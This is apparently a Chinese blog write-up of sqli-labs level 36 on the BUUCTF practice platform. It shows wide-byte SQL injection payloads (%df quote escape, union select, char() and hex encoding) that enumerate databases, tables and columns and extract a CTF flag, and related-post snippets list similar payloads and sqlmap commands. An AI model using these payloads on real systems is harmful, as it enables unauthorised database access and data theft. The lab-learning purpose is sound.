buuctf的sqli-labs靶场的36关,(宽字节注入)

最新推荐文章于 2024-05-06 20:39:12 发布
原创 最新推荐文章于 2024-05-06 20:39:12 发布 · 440 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #系统安全 #web安全 #密码学 #计算机网络 #安全威胁分析

本文介绍了在buuctf在线评测中的宽字节注入方法,包括确认字段数量、爆库名、表名、数据以及获取flag的过程,同时提醒了两个关键注意事项:表名注入时避免单双引号转义,以及使用ASCII码、hex转换库名以绕过过滤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

开启buuctf靶机

开始宽字节注入

注意(1):

注意(2):

开启buuctf靶机

BUUCTF在线评测

找到第36关

开始宽字节注入

(1)确认有几个字段:?id=1 %df' order by 3%23
(2)爆库名:(ctftraining,information_schema,mysql,performance_schema,security,test)
?id=1 %df' and 1=2 union select 1,2,(select group_concat(schema_name) from information_schema.schemata) --+
(3)爆表名:flag,news,users
?id=1 %df' and 1=2 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=char(99,116,102,116,114,97,105,110,105,110,103)) --+
(4)爆数据:flag
?id=1 %df' and 1=2 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema=0x637466747261696E696E67 and table_name=0x666C6167) --+
(5)爆flag:flag{330424d1-f551-4cc2-96ed-8e37018fe6c7}
?id=1 %df' and 1=2 union select 1,2,(select group_concat(flag) from ctftraining.flag)--+

注意(1):

爆表名的时候这里有个小坑,就是库名这里不能有单双引号,否则会被转义

注意(2):

先把刚才爆出来的库名字符转换成ASCII码,然后这里使用char()函数转换成可打印字符

还可以把库名使用hex转字符串的方法,0x637466747261696E696E67

这里有几种注入方式:char()、二进制、十六进制、传参

DMXA
关注
BUUCTF/sqli-labs 1-23
weixin_44041994的博客
03-21 1906
因为#号后面都被注释了。这输入正确用户名密码后,页面显示的不再是User-Agent,而是变成了Refer,我们通过抓包更改Refer,发现和18差不多,只不过18有3个参数,而19只有两个参数。上面提示让我们使用outfile,outfile是sql的语法,可以通过into outfile命令,将查询到的结果写入目标路径,在知道目标系统的绝对路径时可以使用,如。这通过测试,发现无论sql语句正确与否,返回的信息都是一样的,这样就不符合布尔注入的前提了,布尔盲注只适用于正确与错误结果不同的情况。
sqli-labs训练平台靶场详解!!!!
ytdd66的博客
03-19 9181
下面选取几个具有代表性的卡,演示几种 SQL 注入漏洞利用方法。
【CTF Web】XCTF GFSJ0485 simple_php Writeup(代码审计+GET请求+PHP弱类型漏洞)
HEX9CF的技术博客
05-06 608
小宁听说php是最好的语言,于是她简单学习之后写了几行php代码。
BUUCTFweb sqli-labs 1(sql注入
weixin_45844670的博客
10-12 2116
查询闭合 http://54250e8c-3b6c-4a66-8079-9beb8d389458.node3.buuoj.cn/Less-1/?id=0' 查询数据库 http://54250e8c-3b6c-4a66-8079-9beb8d389458.node3.buuoj.cn/Less-1/?id=0' union select 1,2,group_concat(schema_name) from information_schema.schemata -- a 查询表名 http://54250e
宽字节注入靶场
weixin_45540609的博客
04-18 337
题目一——手工注入 输入' and 1=1 传参单引号被注释掉了,说明有宽字节注入 在1后添加%df传入汉字,注释掉单引号,传参正常了 1%df ' and 1=1 -- qwe 猜字段,有三个字段 1%df' order by 4 -- qwe 找回显点,回显点在2和3 1%df' union select 1,2,3 -- qwe 拿库名 1%df' union select 1,database(),3 -- qwe 拿表名 1%df' uni...
宽字节注入靶场
qq_39416206的博客
03-11 322
宽字节注入
sqli-labs Less-32、33、34、35、36、37(sqli-labs指南 32、33、34、35、36、37)—宽字节注入
m0_54899775的博客
12-26 2031
sqli-labs Less-32、33、34、35、36、37(sqli-labs指南 32、33、34、35、36、37)—宽字节注入
sqli-labs靶场(23-38
weixin_51566481的博客
08-16 1346
sqli-labs,sql注入
SQL-Labs靶场36-37”教程
钟言的博客
03-19 3719
本篇为SQL-Labs靶场36到37的通教程,详细内容包含了:一、36 GET单引号宽字节注入1、源码分析2、联合查询注入3、updatexml报错注入4、floor报错注入37POST单引号宽字节注入1、源码分析2、联合查询注入3、updatexml报错注入4、floor报错注入等内容
BUUCTF-sqli-labs1
Nothing-one的博客
07-16 1786
根据题目内容他让我们(请输入id作为带数值的参数 )这个为数字型注入。 这里面我用了sqlmap工具来进行解题。 在里面输入 python sqlmap.py -u +(网站名)(记住在网站名后面要加入?id=1) --dbs #获取数据库 这样我们就可以获得数据库中的名称了。 下面我们就要看数据库中的表明了。 python sqlmap.py -u +(网站名) -D 数据库名 --tables #列出表名 我们知道了表名,下面我们就要爆出字段名。 python sqlmap.py -u +(网站名)
webug3.0渗透测试靶场
05-07
webug3.0渗透测试靶场!从官方虚拟机中提取出来的!代码优化,去除重复的文件!内附安装介绍及搭建工具!
sqli-labs(36)
weixin_30301449的博客
06-01 347
0X01发现又是‘’被过滤了 ?id=1%df%27%20and%201=2%23 错误 ?id=1%df%27%20and%201=1%23 正确 存在注入 0X01爆数据库 ?id=-1%df%27%20union%20select%201,database(),3%23 0x02组合拳打法 转载于:https://www.cnblogs.com/-zh...
sqli-labs 36-65闯
小龙在线
10-24 444
第三十六:mysql_real_escape_string宽字符+GET单引号 跟第三十三基本一致。 ?id=-1%E6' union select 1,2,database() --+ ?id=2&id=-1%E6' union select 1,2,database() --+ ?id=2&id=-1%E6' union select 1,2,group_concat(schema_name) from information_schema.schemata--+ ?id=2&amp
宽字节注入靶场练习
weixin_60777183的博客
08-30 447
课堂知识点: 当有魔术引号无法闭合时,绕过方法: 1.找不需要闭合的地方(即没有单双引号等闭合的地方) 2.仔细查看作用域(魔术引号只对get post cookie传参有效) 3.宽字节法。(当我们在\前传了一个字符,用gbk编码可以跟\组成一个字,\就逃 逸了出来) ps:国际编码:utf-8 汉字编码:gbk 采用宽字节绕过的办法: url编码中,一个英文单引号’用url编码表示是 %27 url编码中,一个反斜杠\用url编码表示是 %5c %df\可以凑成汉字 %9c\ %dd\等也可以
buuctf---sqli-labs靶场,两种报错注入的方式(XPATH型和主键重复型)
DMXA的博客
10-07 388
【代码】buuctf---sqli-labs靶场,两种报错注入的方式(XPATH型和主键重复型)
sqli-labs buuctf平台+本地环境 全全解 不是很详解(<_<)
weixin_48083470的博客
07-12 2201
sqli-labsbuuctf平台 搜索sqli-labs 可以更加模拟线上赛的环境 less-1 less-5 ?id=0' and(select extractvalue(1,concat('~',(select database())))) %23 报错注入详细讲解:https://blog.csdn.net/silence1_/article/details/90812612 less-6 发现不报错了,用布尔盲注 写python代码来跑出内容 import requests url
sqli-labs/Less-36
m0_71299382的博客
11-21 230
sqli-labs第三十六
sqli-labslesson36-40
m0_62207170的博客
03-06 356
sqli-labs
sqli-labs靶场的考察重点是什么?
最新发布
07-25
由于sqli-labs靶场卡众多,我们将按卡类型(数字型、字符型、报错注入、盲注等)分类总结,并选取典型卡说明。 ### 1. 数字型注入(Less-1, Less-2等) - **考察重点**:判断注入点类型(数字型无需闭合引号...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

DMXA

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值